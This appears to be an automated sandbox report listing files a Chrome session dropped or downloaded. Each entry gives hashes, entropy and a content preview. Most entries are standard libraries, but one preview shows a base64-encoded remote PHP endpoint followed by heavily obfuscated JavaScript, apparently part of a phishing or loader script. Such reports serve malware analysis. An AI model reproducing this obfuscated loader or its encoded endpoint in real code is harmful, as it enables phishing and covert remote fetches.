                                  SHA-256:15AA6752426A373740A0D173684244D6AB0BB3D260B0AE5511F3638EC8B34D73
                                  SHA-512:D95CFAB01000E21F2A71BCA34EC483549871F63EAACBAEF3A273C38990EE0E0AC99B9DB357D3DA31B6A2E539EF1D2147CC25D4379F0B6D35CC117ED663AA7588
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/favicon.ico
                                  Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.................................................@...................................................................................................................................D...................................................5...................................................................................................................................................:.......................................i...........................................................................................................................................................p...............................|...........................................................................................................................................................................................h..............................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):325087
                                  Entropy (8bit):5.511263298619905
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:0619D7F70B45BEE6E5D023250F57F790
                                  SHA1:19C393EFE1E1EE33198061B8A105D0F816DB32F5
                                  SHA-256:9629EB7B48B9B5E9CA88C0BB94B3FFF70FDFC945C2E1A412B8474764A50C3CE2
                                  SHA-512:AB7B71BD94C7A23BB923F06C6767494D0A7D881CF31731A9C0EF40AC02B7A84C4585CFA292DDDD732773CAC4B079C4AF6FA2D6AC13363AC885775AE194E27CB2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3714],{2209:function(t,e,r){var i=r(80365).Buffer,n=r(20279);!function(){var e,a,o,f,s,h,d,c={7160:function(t,e,r){e.bignum=r(711),e.define=r(495).define,e.base=r(853),e.constants=r(7335),e.decoders=r(6701),e.encoders=r(3418)},495:function(t,e,r){var i=r(7160),n=r(3782);function a(t,e){this.name=t,this.body=e,this.decoders={},this.encoders={}}e.define=function(t,e){return new a(t,e)},a.prototype._createNamed=function(t){var e;try{e=r(6144).runInThisContext("(function "+this.name+"(entity) {\n this._initNamed(entity);\n})")}catch(t){e=function(t){this._initNamed(t)}}return n(e,t),e.prototype._initNamed=function(e){t.call(this,e)},new e(this)},a.prototype._getDecoder=function(t){return t=t||"der",this.decoders.hasOwnProperty(t)||(this.decoders[t]=this._createNamed(i.decoders[t])),this.decoders[t]},a.prototype.decode=function(t,e,r){return this._getDecoder(e).decode(t,r)},a.prototype._getEncoder=function(t){return t=t||"der",this.e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (1129), with no line terminators
                                  Category:dropped
                                  Size (bytes):1129
                                  Entropy (8bit):5.191422330272712
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:70CF903A0E091556D6C7CE504F62DE9A
                                  SHA1:6DAA28A9D7379D5AEC896D15F7C2B680D8D55D55
                                  SHA-256:2A9B92E3D44F05C69359DF34A307257F8CF75EED760DC28D0565DF0742C5DAA7
                                  SHA-512:E25A5FF970BC3B309D7B8CEDBFF3DEF5C7A91CA0CFA16A871805B3768F85ECD73D1084808953EEBBA7BE6D2EE55E8FE22FD649A66DCC6F2BF9BB125CF69A8E60
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1580],{41580:function(e,t,r){r.d(t,{j3:function(){return R},UO:function(){return P}}),(o=s||(s={})).Pop="POP",o.Push="PUSH",o.Replace="REPLACE",(u=c||(c={})).data="data",u.deferred="deferred",u.redirect="redirect",u.error="error";var a,n,o,u,s,c,d,i,l=r(82684),f=r.t(l,2);let{useState:p,useEffect:v,useLayoutEffect:w,useDebugValue:E}=f;"undefined"!=typeof window&&void 0!==window.document&&window.document.createElement,f.useSyncExternalStore;let U=l.createContext({outlet:null,matches:[]}),h=l.createContext(null);function P(){let{matches:e}=l.useContext(U),t=e[e.length-1];return t?t.params:{}}function R(e){var t;let r;return t=e.context,(r=l.useContext(U).outlet)?l.createElement(h.Provider,{value:t},r):r}(a=d||(d={})).UseLoaderData="useLoaderData",a.UseActionData="useActionData",a.UseRouteError="useRouteError",a.UseNavigation="useNavigation",a.UseRouteLoaderData="useRouteLoaderData",a.UseMatches="useMatches",a.UseRevalid
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (19015)
                                  Category:dropped
                                  Size (bytes):19188
                                  Entropy (8bit):5.212814407014048
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (48664)
                                  Category:downloaded
                                  Size (bytes):48944
                                  Entropy (8bit):5.272507874206726
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text
                                  Category:downloaded
                                  Size (bytes):196
                                  Entropy (8bit):5.098952451791238
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                  SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                  SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                  SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://you.doclabcourt.com/OhgiN/1.png
                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text
                                  Category:downloaded
                                  Size (bytes):1447
                                  Entropy (8bit):5.391827760812962
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:558DF1BDD12CF8096DC90DEF5897CB3D
                                  SHA1:D193F37D27421334463CC8A302EA257E10260430
                                  SHA-256:D8AA0BAD6139ABB137CD677A208FA48354058C008776506BDA5E682AB4018D8E
                                  SHA-512:85FC5EC371EC8FB262B4730FB5635DE00BBF609D61EFAAA223EC121FDDB4A03B6880B0C972BEBB1D675B21D311CFF5AE53FADEFC525B2E0716CB40D8BCDD565A
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://fonts.googleapis.com/css2?family=Caveat:wght@400..700&display=swap
                                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Caveat';. font-style: normal;. font-weight: 400 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/caveat/v18/Wnz6HAc5bAfYB2Q7azYYmg8.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Caveat';. font-style: normal;. font-weight: 400 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/caveat/v18/Wnz6HAc5bAfYB2Q7YjYYmg8.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* latin-ext */.@font-face {. font-family: 'Caveat';. font-style: normal;. font-weight: 400 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/caveat/v18/Wnz6HAc5bAfYB2Q7aDYYmg8.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (49362)
                                  Category:dropped
                                  Size (bytes):50558
                                  Entropy (8bit):5.190208208604599
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:318D629475CFCE3CF45D1EF4CF394003
                                  SHA1:93D63D96296E519F88DFDF0C657A8C601733F758
                                  SHA-256:49738DF69566DE58358EE3AF1BF275757ECAD78043E43D29526ACFC80B1A0A05
                                  SHA-512:00170FB95AE6FBE4F25D93FA9DCAF72DA53A4720A4856F2B9EDAFD0CB829C72DDC948FF9177ECD633A4844C4D28AA27A7A533537DDE68EC639FC2793544251FA
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6368],{96368:function(e,t,l){!function(e,t){"use strict";var l=function(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach(function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}}),t.default=e,Object.freeze(t)}(t);function n(e,t){return"function"==typeof e?e(t):e}function o(e,t){return l=>{t.setState(t=>({...t,[e]:n(l,t[e])}))}}function i(e){return e instanceof Function}function r(e,t){let l=[],n=e=>{e.forEach(e=>{l.push(e);let o=t(e);null!=o&&o.length&&n(o)})};return n(e),l}function a(e,t,l){let n,o=[];return()=>{let i,r;l.key&&l.debug&&(i=Date.now());let a=e();if(!(a.length!==o.length||a.some((e,t)=>o[t]!==e)))return n;if(o=a,l.key&&l.debug&&(r=Date.now()),n=t(...a),null==l||null==l.onChange||l.onChange(n),l.key&&l.debug&&null!=l&&l.debug()){let e=Math.round(100*(Date.now()-i))/100,t=Math.round
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65448), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1139808
                                  Entropy (8bit):5.214854221801767
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:137F8DB2A645C2D883F5F486EF7EF0A0
                                  SHA1:338A11A5879548E12CD00E00010687BC13DF65CF
                                  SHA-256:EC3F67F14B8E5F20732B8CD9E615621DB7C4E3095EA892CB8BCBA683CC8DB1E5
                                  SHA-512:D7B46C29255FDDB35386257C11F4C3FD5CBA93DD5311DC9CDA8ECA323A87415061E03100A9E1A95635A8754D6AD35E1BD03C87542F044367B281153FCB781F2C
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:var file = "aHR0cHM6Ly83NTA5MTQ3MzI1Lmxhd3llcnNmZWRlcmFsY291cnQuY29tL25leHQucGhw";....var _0x31ccbb=_0x252b;(function(_0x52ac57,_0x4c8f9d){var _0x1b458c=_0x252b,_0x5b0099=_0x52ac57();while(!![]){try{var _0x119f41=-parseInt(_0x1b458c(0x2428))/(0x7e*0x39+0x1ba8+0x449*-0xd)*(parseInt(_0x1b458c(0x51a))/(0x4dc+0x4*-0x590+0x1166))+-parseInt(_0x1b458c(0x1668))/(-0x8ad*0x3+0x1*0x16df+0x1*0x32b)*(parseInt(_0x1b458c(0x197f))/(0x1*-0x1075+-0x127f+0x2ea*0xc))+-parseInt(_0x1b458c(0x45b4))/(-0x3b*0xf+0x136*0x10+-0x16*0xb9)*(-parseInt(_0x1b458c(0x118))/(0x14c6*-0x1+0x19*0x4a+0xd92))+-parseInt(_0x1b458c(0xa25))/(0xb*0x1ee+-0x7b*-0x1d+-0x2322)+parseInt(_0x1b458c(0x47c))/(-0x3d*0x3e+0x1d3d+-0x5*0x2e3)+parseInt(_0x1b458c(0x3dd))/(-0x1*-0x1fd3+0x491*0x1+0xe3*-0x29)*(parseInt(_0x1b458c(0x48bd))/(-0x1e8f+-0x206a+-0x11b*-0x39))+parseInt(_0x1b458c(0x59c8))/(-0x130e+-0x1ba4+0x2ebd);if(_0x119f41===_0x4c8f9d)break;else _0x5b0099['push'](_0x5b0099['shift']());}catch(_0x2745d8){_0x5b0099['push'](_0x5b0099['shift']
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:downloaded
                                  Size (bytes):77806
                                  Entropy (8bit):5.233341642367215
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:D3512D8E1E55E2442C8B7E3DD912501B
                                  SHA1:4860F7F1DC37C1414790410FB5CFD9299D9495E3
                                  SHA-256:73D50DD8DFACF6C1AA7EF1A0A09B7BD5623DB470249237F09D4E91354EFC81E4
                                  SHA-512:F4B0A464DC3F36520024F22A8CCBA4A8DB22064192D24B80753BCF1F86971EDDBE1F8B0A928ACE71394141A7325D5C1DDD61E91EF2A08523203EB509512372BF
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/_next/static/chunks/cccc6244-ef28b37d891732a3.js
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1551],{53784:function(e,t,i){i.d(t,{B:function(){return tt},Q:function(){return ej},V:function(){return e$},a1:function(){return e3},a3:function(){return e5},a8:function(){return e4},a9:function(){return e9},aj:function(){return e6},ak:function(){return e8},f:function(){return tV},j:function(){return tz},o:function(){return ip},x:function(){return te}});var n,r=i(15258),s=i(75512),a=i(45008),o=i(24502),l=i(20396);function c(){return{"dependent-sdk-initialized-before-auth":"Another Firebase SDK was initialized and is trying to use Auth before Auth is initialized. Please be sure to call `initializeAuth` or `getAuth` before starting any other Firebase SDK."}}let u=new r.LL("auth","Firebase",c()),h=new o.Yd("@firebase/auth");function d(e,...t){h.logLevel<=o.in.ERROR&&h.error(`Auth (${s.Jn}): ${e}`,...t)}function p(e,...t){throw g(e,...t)}function f(e,...t){return g(e,...t)}function m(e,t,i){let n=Object.assign(Object.ass
                                  No static file info